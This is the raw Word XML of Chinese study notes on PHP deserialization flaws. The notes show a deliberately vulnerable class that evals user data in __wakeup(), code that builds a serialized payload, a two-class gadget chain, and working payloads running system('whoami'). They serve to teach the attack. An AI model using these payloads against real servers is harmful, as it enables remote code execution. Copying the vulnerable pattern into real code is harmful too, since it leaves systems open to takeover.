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674DE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反序列化漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2174BEB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因为在反序列化的时候会自动调用一些方法,而同时有满足这些条件时:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCC7C4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应用接受外部可控的序列化数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1E5D4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反序列化时自动执行危险方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31396C70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类路径中包含可被利用的类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36312F7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反序列了漏洞1:分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F010BAC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="0000BB"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php 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    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class 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example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{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        public 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$handle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;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        function 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__wakeup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(){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            eval(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$this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-&gt;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handle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);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        }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    }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    if(isset(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$_GET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[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'data'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])){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        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$user_data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=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unserialize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(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$_GET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[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="DD0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'data'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]);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    }else{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        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highlight_file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>(</w:t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__FILE__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);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t xml:space="preserve">    } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="007700"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="0000BB"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519422D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这段代码定义了一个example类，并实现了反序列化相关的逻辑：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A6C641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定义了example类，包含一个公有的$handle属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EBF95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实现了__wakeup()魔术方法，该方法会在对象被反序列化时自动调用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3324AD4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__wakeup()方法中使用eval()函数执行$this-&gt;handle中的内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7BCE4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 GET 参数data，并对其进行反序列化操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE6C96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如果没有传入data参数，则显示当前文件的源代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367DDFE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漏洞点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD0AF4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直接代码执行：__wakeup()魔术方法中直接使用eval()执行$this-&gt;handle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395C207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无任何过滤：用户完全控制$handle属性内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61025EE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反序列化入口暴露：通过GET参数data直接接收序列化数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE0033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导致可远程执行任意代码:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468DCF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如:O:7:"example":1:{s:6:"handle";s:17:"system('whoami');";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD746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构造这样的payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359992C6">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D193F5">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class example{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33355B90">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    public $handle = 'phpinfo();'; // 这里可以替换为任意恶意代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708E674F">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B20996">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>echo serialize(new example());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1844DB">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0763871A">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="1C1F23"/>
          <w:spacing w:val="0"/>
          <w:szCs w:val="27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我的理解是:序列化漏洞,通过GET方法上传了一个包含恶意代码地example实例,当反序列化代码后,wakeup_就会执行实例中的恶意代码,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004E0038"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具体流程可以拆解为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686B0B6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攻击者构造一个example类的实例，将$handle属性设置为恶意代码（如system('ls');）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4291DBC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攻击者将这个实例序列化为字符串，通过 GET 参数data提交给服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B38F7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服务器接收到data参数后，调用unserialize()对其进行反序列化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647899C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反序列化过程中，PHP 会自动调用example类的__wakeup()魔术方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6265B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__wakeup()方法执行eval($this-&gt;handle)，此时$this-&gt;handle就是攻击者预先设置的恶意代码，从而导致代码执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519F9C4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这个过程的核心风险点在于：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B31B9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__wakeup()作为反序列化时自动触发的魔术方法，直接执行了用户可控的内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E0836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eval()函数将字符串作为 PHP 代码执行，完全信任了$handle的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17799A6D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整个流程中没有对反序列化的数据进行任何验证或过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6418E30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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434BFBC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example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E8BA1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 w14:paraId="2DE9A9B4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$handle;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28282C7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__wakeup(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57634C7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$this-&gt;funnnn();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC6BD7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535E3C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funnnn(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251491D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$this-&gt;handle-&gt;close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5998C88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568BB0A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B9B3987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class process{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0F682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$pid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EDFF99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function close(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7946B0C2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eval($this-&gt;pid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E6263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6AB3156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29427E5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if(isset($_GET['data'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C528AB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$user_data=unserialize($_GET['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F6AFA5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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1918AEE6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highlight_file(__FILE__);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B4458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111F6EF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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BB76C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有的可能需要长一点里利用链:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241928C3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$process = new process();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BE1FC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$process-&gt;pid = "system('whoami');";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441989BA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$obj = new example();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED0C01C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$obj-&gt;handle = $process;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3804C248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$payload = serialize($obj);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B749A35">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="151BE98E"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O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:17:"system('whoami');";}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F077D1">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4629150" cy="1152525"/>
            <wp:effectExtent l="0" t="0" r="6350" b="31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B013F"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可以看到执行了whoami代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5939454C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612DBB"/>
    <w:rsid w:val="43BD07B0"/>
    <w:rsid w:val="673E6831"/>
    <w:rsid w:val="68A0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  <w:style w:type="paragraph" w:customStyle="1" w:styleId="7">
    <w:name w:val="样式1"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:shd w:val="clear" w:fill="F9FAFB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2025-05-21T05:18:00Z</dcterms:created>
  <dc:creator>童春林</dc:creator>
  <cp:lastModifiedBy>aaa</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-05T14:22:34Z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C2F83F56F8E9455D84D9C878DE9D2E6D_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiMTM3NDk0ZTIyZTk2MmJlNDc2YzE3M2M3MGVmNGZjMDIiLCJ1c2VySWQiOiI2ODY3MzgyNTMifQ==</vt:lpwstr>
  </property>
</Properties>
</file>